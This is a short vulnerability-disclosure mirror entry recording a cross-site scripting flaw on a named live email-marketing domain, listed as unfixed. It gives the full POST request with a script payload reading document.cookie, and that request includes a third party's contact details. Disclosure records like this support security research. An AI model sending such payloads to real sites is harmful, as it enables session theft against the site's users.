Security researcher bho, has submitted on 13/07/2010 a cross-site-scripting (XSS) vulnerability affecting emailer.emailroi.com, which at the time of submission ranked 26172 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 13/07/2010 |
Date published: 13/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: bho |
Domain: emailer.emailroi.com |
Category: XSS |
Pagerank: 26172 |
URL: http://emailer.emailroi.com/multidouble.ice |
POST: username=spiritmtn&contactemail=chris.cherry@spiritmtn.com&contactname=Spirit+Mountain+Casino&Email= <script>alert(document.cookie)</script>&x=0&y=0&list1=ClubList&mandatory=Email&thankyou_firstdouble= http://www.spiritmountain.com/confirm-spirit-mountain-casino-subscription/&editionFirstDouble=ClubLi st_NewsletterConfirmation09&thankyou_message=http://spiritmountain.com/spirit-mountain-newsletter-si gnup-thank-you/ |
Click here to view the mirror
|
|
|